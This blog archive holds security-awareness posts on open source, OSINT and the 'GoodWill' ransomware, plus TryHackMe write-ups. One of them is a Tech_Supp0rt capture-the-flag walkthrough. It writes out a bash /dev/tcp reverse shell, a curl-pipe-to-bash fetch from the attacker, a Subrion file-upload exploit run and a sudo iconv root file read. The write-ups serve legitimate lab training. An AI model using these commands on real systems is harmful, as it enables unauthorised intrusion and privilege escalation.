Monday, June 27, 2022

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch Blog.

 

This week we talk about open source.

    We hear "open source" all over the place, but do you know what it is?  Open source refers to software whose source code (the part that makes up the software) is publicly accessible and whose license lets anyone inspect, modify and redistribute it.  In practice that means you can get the code easily, usually at no cost, and then add, remove or replace any of it to make it your own.  Open source is about the license and the availability of the code rather than the price tag, but most open source software is in fact distributed and used free of charge.  Projects will sometimes have a donation page asking for help to cover the cost of running, maintaining, and updating the software.

    Is all open source software safe to use?  The short answer is no, but the long answer is nnnnnooooooooooooo.  Basically it is a double-edged sword: on one side you (or a programmer) have the ability to check the source code for anything malicious; on the other side, someone malicious could have put something in that source code that you don't know about, or could repackage a legitimate project with something extra added.  That is one reason why you should only download software from the project's own site or its official repository, and, where the project publishes checksums or signatures for its releases, check them before you install.  When you download from third-party sites, you run the risk of downloading a tainted file.
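Here is an added example of the check just mentioned; it is not from the original post.  Most projects publish a SHA-256 digest next to each download (often in a SHA256SUMS file that is itself GPG-signed, which you should verify with gpg first).  The script below compares a downloaded file against a published digest and refuses to install it on a mismatch.  The file names and the "download" it creates are constructed for the demo; the digest is the real SHA-256 of the six bytes "hello" plus a newline.

```sh
#!/bin/sh
# Added example (not from the original post): check a downloaded release
# against the project's published SHA-256 digest before installing it.
# The file contents and names below are constructed for this demo.

# verify_sha256 FILE EXPECTED_HEX
# Returns 0 when FILE's SHA-256 matches EXPECTED_HEX (any case), 1 otherwise.
verify_sha256() {
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    if command -v sha256sum >/dev/null 2>&1; then
        actual=$(sha256sum "$1" | awk '{print $1}')
    else
        actual=$(shasum -a 256 "$1" | awk '{print $1}')   # macOS has no sha256sum
    fi
    [ "$actual" = "$expected" ]
}

# safe_install FILE EXPECTED_HEX DEST
# Copies FILE to DEST only if the digest matches; otherwise refuses and returns 1.
safe_install() {
    if verify_sha256 "$1" "$2"; then
        cp "$1" "$3" && echo "digest ok, installed $3"
    else
        echo "DIGEST MISMATCH for $1: refusing to install" >&2
        return 1
    fi
}

# SHA-256 of "hello\n": this is what a project's SHA256SUMS file would carry.
DEMO_SUM=5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03

# demo_checksum: a genuine file installs, a tampered copy of it is rejected.
demo_checksum() {
    dir=$(mktemp -d)
    printf 'hello\n' > "$dir/project.tar.gz"             # the genuine download
    printf 'hello\n#backdoor\n' > "$dir/tainted.tar.gz"  # a tampered copy
    safe_install "$dir/project.tar.gz" "$DEMO_SUM" "$dir/installed" || return 1
    if safe_install "$dir/tainted.tar.gz" "$DEMO_SUM" "$dir/installed2" 2>/dev/null; then
        return 1    # the tampered file must never be installed
    fi
    rm -rf "$dir"
}
```

The digest only proves the file is the one the project published; it does not prove the project itself is trustworthy, and a digest fetched from the same compromised mirror as the file proves nothing, which is why the signed SHA256SUMS file (and a key you obtained some other way) matters.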

    So what are the advantages and disadvantages of using open source software?  Let us start with the advantages.  Firstly, it is created by people who are very talented and enjoy what they do; if they didn't like what they do, they would not have created it.  Secondly, it tends to be cheaper than commercial versions: it is either free, asks for a lower cost, or asks for a donation to the project.  Thirdly, popular projects tend to be reliable, because many people use, read and fix the same code.  Lastly, it is flexible: since you are not tied to a proprietary software architecture, it can often be used or configured on many platforms.

    Now let us look at the disadvantages.  Firstly, because anyone can modify and redistribute it, a copy could have malicious code hidden in it, which is why you download it from a reputable site.  Secondly, it might not be as user-friendly as its proprietary counterpart.  Thirdly, when it comes to support, it is more community based.  You might not be able to go to the creator's website and get a solution to your problem; you'll probably have to check out forums and posts from people who had the same issue as you and how they fixed it.  Sometimes you'll find a solution, sometimes you won't.

    We all use open source software daily; Thunderbird, our email client, is open source.  Sometimes you just need to do a little research to vet whether the software is good and legitimate.  As always, if you have any questions feel free to email me, and let me know if you have any topic you'd like me to talk about.  Have a great week.





If you'd like to read more about open source, this is where I got some of my information:
https://connectusfund.org/7-main-advantages-and-disadvantages-of-open-source-software

https://opensource.com/resources/what-open-source

TryHackMe write-up | MITRE Task 3 ATT&CK® Framework

 

What is the ATT&CK® framework? According to the website, MITRE ATT&CK® is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. In 2013, MITRE began to address the need to record and document common TTPs (Tactics, Techniques, and Procedures) that APT (Advanced Persistent Threat) groups used against enterprise Windows networks. This started with an internal project known as FMX (Fort Meade Experiment). Within this project, selected security professionals were tasked to emulate adversarial TTPs against a network, and data was collected from the attacks on this network. The gathered data helped construct the beginning pieces of what we know today as the ATT&CK® framework.

The ATT&CK® framework has grown and expanded throughout the years. One notable expansion: the framework originally focused solely on the Windows platform but now covers other platforms, such as macOS and Linux. The framework is heavily contributed to by many sources, such as security researchers and threat intelligence reports. Note that this is not only a tool for blue teamers; it is also useful for a penetration tester and/or red teamer.

If you haven't done so, navigate to the ATT&CK® website. Direct your attention to the bottom of the page to view the ATT&CK® Matrix for Enterprise. Across the top of the matrix, there are 14 categories. Each category contains the techniques an adversary could use to perform the tactic. The categories cover the seven-stage Cyber Attack Lifecycle (credit Lockheed Martin for the Cyber Kill Chain).

Under Initial Access, there are 9 techniques. Some of the techniques have sub-techniques, such as Phishing.

If we click on the gray bar to the right, a new layer appears listing the sub-techniques.

To get a better understanding of this technique and its associated sub-techniques, click on Phishing.

We have been directed to a page dedicated to the technique known as Phishing and all related information regarding the technique, such as a brief description, Procedure Examples, and Mitigations.

You can alternatively resort to using the Search feature to retrieve all associated information regarding a given technique, sub-technique, and/or group.

Lastly, the same data can be viewed via the MITRE ATT&CK® Navigator: The ATT&CK® Navigator is designed to provide basic navigation and annotation of ATT&CK® matrices, something that people are already doing today in tools like Excel. We've designed it to be simple and generic - you can use the Navigator to visualize your defensive coverage, your red/blue team planning, the frequency of detected techniques, or anything else you want to do.

You can access the Navigator view when visiting a group or tool page. The ATT&CK® Navigator Layers button will be available.

In the sub-menu select view.

Let's get acquainted with this tool. Click here to view the ATT&CK® Navigator for Carbanak.

At the top left, there are 3 sets of controls: selection controls, layer controls, and technique controls. I encourage you to inspect each of the options under each control to get familiar with them. The question mark at the far right will provide additional information regarding the navigator.

To summarize, we can use the ATT&CK Matrix to map a threat group to their tactics and techniques.  There are various ways the search can be initiated.

The questions below will help you become more familiar with the ATT&CK®. It is recommended to start answering the questions from the Phishing page. Note, that this link is for version 8 of the ATT&CK Matrix.

Answer the questions below

Only blue teamers will use the ATT&CK Matrix? (Yay/Nay)?

How to: You can find this answer in the second paragraph above. 

Answer: Nay

What is the ID for this technique? 

How to: The last paragraph recommends you start at the Phishing page; this is the technique it is talking about. Once you are on the page, on the right hand side you will see a box with information in it; inside the box is the ID, which is the answer to this question. 

Answer: T1566 

Hint: https://attack.mitre.org/versions/v8/techniques/T1566/

Based on this technique, what mitigation covers identifying social engineering techniques? 

How to: Staying on the Phishing page, scroll down till you see the table labeled Mitigations. Then read through till you find which mitigation covers social engineering techniques. This is the answer. 

Answer: User Training

There are other possible areas for detection for this technique, which occurs after what other technique? 

How to: It took me a while to figure this out and find it; the question is worded very oddly. But the hint is a URL, so if you go to that site the answer can be found in the final paragraph of Detection. 

Answer: User Execution 

Hint: https://attack.mitre.org/versions/v8/techniques/T1566/

What group has used spear phishing in their campaigns? 

How to: Stay on the page that TryHackMe gave you as a hint in the previous question (https://attack.mitre.org/versions/v8/techniques/T1566/). Scroll to Procedure Examples; the answer is one of the names in Procedure Examples. 

Answer: Dragonfly

Based on the information for this group, what are their associated groups? 

How to: This question is based off of the answer to the previous question. Click on the group to go to its MITRE page; once there, on the right side of the screen will be a box. Inside the box are the Associated Groups; copy them and paste them in as the answer. 

Answer: TG-4192, Crouching Yeti, IRON LIBERTY, Energetic Bear

What tool is attributed to this group to transfer tools or files from one host to another within a compromised environment? 

How to: Scroll down till you see the Software category, then look through and read the descriptions till you find which one can transfer tools and files. This will be your answer. 

Answer: PsExec

Based on the information about this tool, what group used a customized version of it? 

How to: Click on the tool that was the answer to the previous question. This will take you to that tool's page; scroll down till you see Groups That Use This Software. Look through the groups and their descriptions to see who uses a customized version of the tool. 

Answer: FIN5

This group has been active since what year? 

How to: Click on the group that was the answer to the previous question. You will be brought to the group's page; the description paragraph at the top of the page has the answer to this question. 

Answer: 2008

Instead of Mimikatz, what OS Credential Dumping tool does this group use? 

How to: Staying on this page, scroll down till you see the Software category, then look through the software this group uses till you find the OS Credential Dumping tool that is not Mimikatz. This is your answer. 

Answer: Windows Credential Editor


TryHackMe write-up | MITRE Task 2 Basic Terminology

Before diving in, let's briefly discuss a few terms that you will often hear when dealing with the framework, threat intelligence, etc. APT is an acronym for Advanced Persistent Threat. This can be considered a team/group (threat group), or even a country (nation-state group), that engages in long-term attacks against organizations and/or countries. The term "advanced" can be misleading, as it tends to make us believe that every APT group has some super-weapon, i.e. a zero-day exploit, that they use. That is not the case. As we will see a bit later, the techniques these APT groups use are quite common and can be detected with the right implementations in place. You can view FireEye's current list of APT groups here.

TTP is an acronym for Tactics, Techniques, and Procedures, but what does each of these terms mean? The Tactic is the adversary's goal or objective. The Technique is how the adversary achieves the goal or objective. The Procedure is how the technique is executed.

If that is not clear now, don't worry. Hopefully, as you progress through each section, TTPs will make more sense.

Answer the questions below

Read the above

How to: No Answer Needed. 

Answer: No Answer Needed.

TryHackMe write-up | MITRE Task 1 Introduction to MITRE

For those who are new to the cybersecurity field, you have probably never heard of MITRE. Those of us who have been around might only associate MITRE with the CVE (Common Vulnerabilities and Exposures) list, which is one resource you'll probably check when searching for an exploit for a given vulnerability. But MITRE researches many areas, outside of cybersecurity, for the safety, stability, and well-being of our nation.  These areas include artificial intelligence, health informatics, and space security, to name a few.

From Mitre.org: At MITRE, we solve problems for a safer world. Through our federally funded R&D centers and public-private partnerships, we work across government to tackle challenges to the safety, stability, and well-being of our nation.

In this room, we will focus on other projects/research that the US-based non-profit MITRE Corporation has created for the cybersecurity community, specifically:

ATT&CK® (Adversarial Tactics, Techniques, and Common Knowledge) Framework

CAR (Cyber Analytics Repository) Knowledge Base

SHIELD (sorry, not a fancy acronym) Active Defense

AEP (ATT&CK Emulation Plans)

Let's dive in, shall we...

Answer the questions below

Read the above

How to: No Answer Needed. 

Answer: No Answer Needed.


Tuesday, June 21, 2022

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch Blog.


 Today we will talk about OSINT.

 

            What is OSINT and how do you pronounce that?  Let's start with the latter and work our way from there.  It is pronounced O SIN T: start with the O, say SIN, and end it with a T.  So what is OSINT?  It stands for Open Source Intelligence, which Wikipedia defines as "the collection and analysis of data gathered from open sources (overt and publicly available sources) to produce actionable intelligence."  Basically, it means any information you can gather by publicly available means.  It's the first step some hackers take to investigate you and find out all they can, so that they can hack or take advantage of you. 

 

            Are hackers the only ones who do this? Nope, it is not just hackers who use OSINT; businesses, law enforcement, and nation-state actors do too.  Businesses use OSINT to gather knowledge about consumers so as to market to them better and thus increase profits.  Law enforcement uses it to gather knowledge about people they are trying to arrest, to build a better case against them.  Nation-state actors use this info for all sorts of malicious things, from spear phishing (a targeted phishing campaign) to industrial sabotage.  Nation-state actors can be some of the most highly trained and devoted hackers out there. 

 

            You are probably asking yourself, how does this pertain to me?  OSINT can be used to learn more about you!  This is one reason I say to keep all your accounts as private as possible and don't overshare on social media.  But how do they find all this out?  Nowadays there is software that can sweep the internet for certain usernames, email addresses, etc.  But the most common technique used today is called Google hacking, or more commonly Google Dorking.  Techopedia defines Google Dorking as "a hacking technique that makes use of Google's advanced search services to locate valuable data or hard-to-find content."  So you use advanced search operators that are already baked into Google's search engine.  In the next paragraph we will look into how this is done and ways you can use it to your benefit.

 

            So let's say you wanted to search a website (let's say Target) for an item or items (let's say Pokemon).  You could type pokemon target in the Google search bar and you'll get everything from Pokemon cards to toys to YouTubers who went to Target for Pokemon.  Now if we put site:target.com "Pokemon" in the Google search bar, this will search only the Target website for anything that has the word Pokemon in it.  You can do this with any website and any search terms; I used this process when looking for printer ink here at SMC.  There is a ton you can do with Google Dorking; I've linked a Google dork cheat sheet in the sources if you care to look.

 

            Other than Google Dorking, what are some other ways that people find OSINT?  Well, once someone gets your name, or even a username that you use on social media, video games, etc., they can start to build their OSINT on you by searching for either of those terms, and as they find more info it gives them more to search for.  It's like a snowball effect, or an even stranger analogy: the person who takes a penny and trades up until they eventually have a car.  It is for reasons like these that I advocate that you use a password manager and 2FA, change your accounts to private, and never trust anyone online or on the phone.  If you do just a couple of these then you will be ahead of so many people.

 

            I hope this has been eye-opening and gives you a better understanding of what OSINT is and how it can be used to help or harm you.  As always, if you have any questions or concerns feel free to call or email me; I'd love to talk about it.  Also, if you have any DR note topics you want me to discuss, please let me know.  Until next week, I hope you have a great week and Be Awesome.

 


Source:

Open-source intelligence: https://en.wikipedia.org/wiki/Open-source_intelligence

Nation State Threat Actors: From a Security Awareness Perspective: https://www.sans.org/blog/nation-state-threat-actors-from-a-security-awareness-perspective/

What is Spear Phishing: https://www.knowbe4.com/spear-phishing/

Google Dorking: https://www.techopedia.com/definition/30938/google-dorking

Google Dork Cheatsheet: https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06

OSINT Framework: https://osintframework.com

Tuesday, June 14, 2022

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch Blog.


 Today we will talk about the "GoodWill" ransomware

 

Have you heard of this ransomware?  It is called "GoodWill" and it seems to aim at making you a better person.  You may be asking yourself how it does this.  Well, I shall discuss with you how it is done.  First, your computer will need to be infected with this ransomware; this can happen like any other malware infection on your PC.  You clicked on a link you shouldn't have, downloaded a pirated movie or game, went to that porn site, etc.  But now your computer is infected and there is only one way to get your files decrypted.

 

Technically there are several "Activities" in this one way, but we shall look at them one at a time.  The first "Activity" they require you to do is to clothe a roadside homeless person.  But you not only have to give them clothing, you must also create a Facebook, Instagram, or WhatsApp story about clothing the homeless.  You must also use the photo frame they give you and encourage others to do it as well.  Once you do this, you have to send them an email with a screenshot of the post and the post link.  Here is my favorite part; it says, and I quote, "later our team will verify the whole case and promotes you for the next activity".  So then you have to wait till their team verifies what you have done before you can move on to the next "Activity".  Let's look at the next "Activity" to see what our "GoodWill" entails.

 

The next "Activity" is to pick up 5 poor children from your neighborhood and take them out for dinner at Domino's, Pizza Hut, or KFC.  Then once again you have to make a story post on your social media, but this time the kids have to be in the picture and have smiles on their faces.  You must again use their picture frame and take screenshots of the post, and this time you also need a picture of your receipt to send along to the ransomware people.  And again you have to wait for it to be verified before you can move on to the third and final "Activity".

 

The final "Activity" requires you to go to your nearest hospital, find someone who needs their care paid for because they don't have the money, and pay their medical bill.  That's correct, you must go pay their medical bill, or as the ransomware states, "provide them maximum part of the required amount."  You also need to take selfies with the person whose medical bill you just paid, record the whole conversation between you and them, and send it back to the ransomware people.  But you're not done yet; after you have done everything above you then need to, and I quote, "Write a beautiful article on your Facebook and Instagram by sharing your wonderful experience to other people that how you transform yourself into a kind human being by becoming victim of a ransomware called Good Will".  So not only do you have to do all these "goodwill" acts, but at the end you have to create a post saying that this ransomware has changed your life for the better.  Then, hopefully, this ransomware group will send you a decryption key with which you can decrypt your files.

 

Well, I don't know about you, but I don't need ransomware forcing me into performing "activities" and making me post about it on social media to create awareness about the plight of being human.  Are these things happening? Yes.  Do you wish more people would help with these issues? Yep.  Should you hijack someone's files and force them into this position in the hope it will make them a better person in the end? Nope.  Ransomware in any form, no matter how "pure" your intentions are, is illegal.  The easiest ways to fight against ransomware are to keep your computer up to date with the latest security updates, to have a good anti-virus in place, and to keep offline backups of your files so you can restore them without ever needing the attacker's key.

 

I hope this has informed you about some of the newest ransomware that could impact not only your work system but even your computer at home.  If you have any questions feel free to leave a comment below.  If you have any ideas for future DR notes please let me know, and maybe it will be a future DR note.  I hope you are having a great week and Be Awesome!

 

 

 


 

Sources:

 

New 'GoodWill' Ransomware Forces Victims to Donate Money and Clothes to the Poor: https://thehackernews.com/2022/05/new-goodwill-ransomware-forces-victims.html

 

Eerie GoodWill ransomware forces victims to publish videos of good deeds on social media: https://blog.malwarebytes.com/ransomware/2022/05/eerie-goodwill-ransomware-forces-victims-to-publish-videos-of-good-deeds-on-social-media/#:~:text=GoodWill%20ransomware%20functions%20like%20any,to%20recover%20your%20locked%20files.




Thursday, June 9, 2022

TryHackMe Tech_Supp0rt: 1 Write up

 Hack into the machine and investigate the target.

 

Please allow about 5 minutes for the machine to fully boot!

 

Note: The theme and security warnings encountered in this room are part of the challenge.

 

To start off I want to give a huge shout-out to my source here; whenever I was stuck I would refer back to this walkthrough, so please show him some love and check it out!

 

Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890

 

 

How to: To start off, make sure you have the machine booted up, and once it is booted copy the IP address of the target machine.  If you are not using the AttackBox, make sure your VM is connected to the TryHackMe OpenVPN.  You can do this by first changing into the folder that holds your OpenVPN profile and running the command sudo openvpn [name of the file.ovpn].  This will get you connected and able to work with the target machine.

 

Now that you are connected to the TryHackMe VPN and have the IP address of the target machine, it is time to do some recon; let's start off with an nmap scan.  The scan I ran was nmap -A [ip of target machine]; the -A enables OS detection, version detection, script scanning, and traceroute.  Here are the results of our nmap scan:

 

(gengartech@kali)-[~]
$ nmap -A 10.10.87.69
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-08 20:08 EDT
Nmap scan report for 10.10.87.69
Host is up (0.088s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ... (RSA)
|   256  ... (ECDSA)
|_  256  ... (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ...; OS: Linux; CPE: ...

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_  Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: ...
| smb2-time:
|   date: ...
|_  start_date: N/A
|_clock-skew: mean: -1h50m01s, deviation: 3h10m30s, median: ...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

 

We can see that ports 22 (SSH), 80 (HTTP), 139 and 445 (SMB) are open.  The next scan to run is smbmap: smbmap -H [IP of target machine] -P 139, where -H sets the host and -P sets the port.  Here are the results of the smbmap scan:


(gengartech@kali)-[~]
$ smbmap -H 10.10.87.69 -P 139
[+] Guest session       IP: 10.10.87.69:139    Name: 10.10.87.69
        Disk            Permissions     Comment
        ----            -----------     -------
        print$          NO ACCESS       Printer Drivers
        websvr          READ ONLY
        IPC$            NO ACCESS       IPC Service (TechSupport server (Samba, Ubuntu))

 

So as you can see, the websvr share is readable, so we might be able to take a peek inside.  Let us try smbclient //[IP of target machine]/websvr.  When prompted for a password, leave it blank and hit enter.  Now we are connected to the share; you can list its contents with the command ls, and we see an interesting file called enter.txt.  We can download the file with the command get enter.txt, which copies it over to your current directory.  You can now type exit to leave the share.  Now use the command cat enter.txt to view the text file.

 

(gengartech@kali)-[~]
$ cat enter.txt
1) Make fake popup and host it online on Digital Ocean server
2) Fix subrion site, /subrion doesn't work, edit from panel
3) Edit wordpress website

Subrion creds
|->admin:[hidden] [cooked with magical formula]
Wordpress creds
|->

 

This gives us some good info and a hint.  For the Subrion creds it says "cooked with magical formula"; that's the hint.  If you go to https://gchq.github.io/CyberChef/ and paste the encoded part of the Subrion creds into the Input pane, you will see a magic wand icon next to the Output pane.  Click the magic wand and CyberChef's Magic operation will detect the encoding and give you the Subrion password, which is hidden here (as are the other passwords in this write-up; you have to do the room yourself):

 




So now we can hold that credential in our back pocket for now.  Next we can run another scan to check for any web directories; we can do this by running Gobuster.  If you don't have Gobuster on your machine you can get it here (https://github.com/OJ/gobuster).  Once you have it, run it with this command: gobuster dir -u http://[IP of target machine] -w /usr/share/dirb/wordlists/common.txt -t 4.  The dir selects directory mode, -u sets the URL, -w sets the wordlist, and -t sets how many threads you will use.  Here are the results of the Gobuster scan:

 

(gengartech@kali)-[~]
$ gobuster dir -u http://10.10.87.69 -w /usr/share/dirb/wordlists/common.txt -t 4
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.87.69
[+] Method:                  GET
[+] Threads:                 4
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/06/08 10:18:25 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/index.html           (Status: 200) [Size: 11321]
/phpinfo.php          (Status: 200) [Size: 94923]
/server-status        (Status: 403) [Size: 276]
/test                 (Status: 301) [Size: 309] [--> http://10.10.87.69/test/]
/wordpress            (Status: 301) [Size: 314] [--> http://10.10.87.69/wordpress/]
===============================================================
2022/06/08 10:20:42 Finished
===============================================================

 

Now we have some of the server's directories and a password; let's see where we can get to.  The enter.txt file we got from the SMB share says "fix subrion site" and "edit from panel", so we can try opening Firefox and browsing to http://[IP of Target Machine]/subrion/panel/.  It should take you to a login panel where we can put in the creds we got from enter.txt.  Here is a picture of the login panel:

 

[Screenshot: Firefox at http://10.10.87.69/subrion/panel/ showing the "Welcome to Subrion Admin Panel" login form (username admin, "Remember me", "Forgot your password?", Login button), with the footer "Powered by Subrion CMS v4.2.1 - Copyright 2008-2022 Intelliants LLC - Back to homepage".]

 

Now that we are inside, if you look at the bottom left you will see the version of Subrion CMS that is running: Subrion CMS v4.2.1.  We can search for it to see if there are any exploits we can use, starting with searchsploit.  I ran the command searchsploit subrion cms 4.2.1 and got back 4 results:


(gengartech@kali)-[~]
$ searchsploit subrion cms 4.2.1
------------------------------------------------------- -------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- -------------------------
Subrion CMS 4.2.1 - 'avatar[path]' XSS                 | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload              | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF)  | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting               | php/webapps/45150.txt
------------------------------------------------------- -------------------------
Shellcodes: No Results

 

I went with the second one, the authenticated arbitrary file upload.  To find the full path I ran searchsploit php/webapps/49876.py -p and got back /usr/share/exploitdb/exploits/php/webapps/49876.py.  I then copied it to my home directory with cp /usr/share/exploitdb/exploits/php/webapps/49876.py /home/[username] (the exploit database is world-readable, so sudo is not actually needed for this; searchsploit -m php/webapps/49876.py will also copy it into your current directory for you).  Now that we have the file, we can run it against the server with python3 49876.py -u http://[IP of Target Machine]/subrion/panel/ -l admin -p Hidden, where -u sets the URL, -l sets the user and -p sets the password.  Once this has run you should have a webshell on the Subrion server:

 

So my next move was to try to upload linpeas to the server to see what weaknesses it had.  I started a Python simple HTTP server and tried to curl linpeas over, but it kept giving me errors, so my next move was to go into the web panel and upload it that way.  Once you have logged in, click on Content and then on Uploads.  You will see a floppy disk icon in Uploads that you can use to upload a file.  This is how I uploaded linpeas:

 

[Screenshot: the Subrion admin panel (Dashboard > Content > Uploads) on 10.10.201.29 with the uploads folder open, showing the uploaded file linpeas.sh, 319 KB.]

 

Once it is in there, run chmod +x linpeas.sh to make it executable (chmod 777 also works, but it makes the file world-writable, which you don't need).  Then run ./linpeas.sh.  You won't see anything happening at first and may think it froze, but it is running and will take a minute.  When it is finished you will have a wealth of knowledge about the server; one thing it found looks like the password to the WordPress site:

 


 

The linpeas output also lists some useful programs present on the system and the users who have logged in.  Note lxc in that list; if the user you land on turns out to be a member of the lxd group, that is a well-known alternative path to root, which is worth checking even though it is not the route taken here.

 

[+] Useful software
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl
/bin/ping
/usr/bin/base64
/usr/bin/python
/usr/bin/python2
/usr/bin/python3
/usr/bin/python2.7
/usr/bin/perl
/usr/bin/php
/usr/bin/sudo
/usr/bin/lxc

[+] Installed Compiler
/usr/share/gcc-5

 

[+] Last logon of each user
Username   Port   From   Latest
root       ...           Sun Nov 28 ... 2021 -0530
scamsite   ...           Fri May ... 2021 -0530

 

So then I created a simple reverse shell script with nano shell.sh, putting in it bash -i >& /dev/tcp/[IP of Attack Machine]/4444 0>&1.  Before running it you need two things on your attack machine: an nc listener for the shell to call back to, and the Python simple HTTP server to serve the script.  First the listener, which I started with nc -lnvp 4444:

 

listening on [any] 4444 ...

 

Then the Python simple HTTP server can be run from the directory holding shell.sh with python -m SimpleHTTPServer (-m runs a library module as a script).  That module is Python 2 only; with Python 3 the equivalent is python3 -m http.server.  Both listen on port 8000 by default:

 

(gengartech@kali)-[~]
$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

 

From there, in the webshell on the target machine, run curl http://[IP of Attack Machine]:8000/shell.sh | bash.  This fetches the script and runs it on the target, which calls back to the nc listener we started on our attack machine:

 

(gengartech@kali)-[~]
$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.6.1.235] from (UNKNOWN) [10.10.201.29] 49180
bash: cannot set terminal process group (...): Inappropriate ioctl for device
bash: no job control in this shell
:/var/www/html/subrion/uploads$ ls

 

Now that we have a reverse shell, I made my way to the tmp folder with cd /tmp, then checked whether Python was on this machine with which python (the command is echoed back because the shell has no tty yet):

 

$ which python
which python
/usr/bin/python

 

Now it's time to upgrade our shell so we can run commands like sudo and su, which need a terminal.  Run python -c 'import pty;pty.spawn("/bin/bash")' (if only python3 is present, python3 -c works the same way); this gives us a pty and lets us run more commands on the system.  Now we can use su scamsite to see if we can switch to that user.  su scamsite prompts for a password, so we can try the ones we already know (they are hidden here; you must do the room to find them).  The second password worked and we are now scamsite!


I ran sudo -l to see what scamsite is allowed to run through sudo:

 

$ sudo -l
sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

 

Once I saw that iconv could be run as root without a password, I went to GTFOBins to see how I could use it:

 

Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

LFILE=file_to_read
sudo iconv -f 8859_1 -t 8859_1 "$LFILE"

 

After trying and failing at it a couple of times, I ran sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt", and it worked!  Converting a file from Latin-1 to Latin-1 changes nothing, so iconv simply prints the file, and because it runs as root it prints a file only root can read.  I got the flag, copied it over and pasted it into TryHackMe.
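As an added example (not from the original write-up or the source walkthrough), here is a small shell script that does the two things this last stretch of the room boils down to: pull the NOPASSWD commands out of sudo -l output so you know exactly which GTFOBins pages to look up, and show why iconv with the same source and target charset acts as a file reader.  The sudo -l text, the multi-command variant and the stand-in for /root/root.txt are constructed for the demo; on the box itself you run the iconv line under sudo, as above.

```sh
#!/bin/sh
# Added example (not part of the original write-up): triage `sudo -l` output
# for NOPASSWD binaries and show the iconv file-read primitive GTFOBins uses.
# The sudo -l text below is constructed to match the shape seen on the target.

# nopasswd_bins SUDO_L_OUTPUT
# Prints, one per line, every command path listed after "NOPASSWD:".
nopasswd_bins() {
    printf '%s\n' "$1" | awk '
        /NOPASSWD:/ {
            sub(/.*NOPASSWD:[ \t]*/, "")        # keep only the command list
            n = split($0, cmds, /,[ \t]*/)      # entries may be comma-separated
            for (i = 1; i <= n; i++) {
                split(cmds[i], parts, /[ \t]+/) # drop any fixed arguments
                print parts[1]
            }
        }'
}

# read_via_iconv FILE
# Converting Latin-1 to Latin-1 changes no bytes, so iconv just copies FILE to
# stdout. Run as root via sudo, that reads any file root can read. GTFOBins
# spells the charset "8859_1"; the canonical name is used here for portability.
read_via_iconv() {
    iconv -f ISO-8859-1 -t ISO-8859-1 "$1"
}

# Constructed sudo -l output in the shape the room shows.
SUDO_L='Matching Defaults entries for scamsite on TechSupport:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv'

# demo_privesc: list the GTFOBins page for each NOPASSWD binary, then read a
# stand-in for /root/root.txt through iconv (without sudo, since this is a demo).
demo_privesc() {
    for bin in $(nopasswd_bins "$SUDO_L"); do
        echo "NOPASSWD binary: $bin -> https://gtfobins.github.io/gtfobins/$(basename "$bin")/"
    done
    f=$(mktemp)
    printf 'flag{demo}\n' > "$f"      # stand-in for /root/root.txt
    read_via_iconv "$f"               # on the box: sudo -u root iconv -f 8859_1 -t 8859_1 /root/root.txt
    rm -f "$f"
}
```

The parser is deliberately simple: it only cares about the NOPASSWD lines, because those are the ones you can abuse without knowing the user's password; commands listed without NOPASSWD still need it.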

 

$ sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt"
sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt"
[flag hidden]

 

Again, a huge shout-out to my source here; whenever I was stuck I would refer back to this walkthrough, so please show him some love and check it out!

 

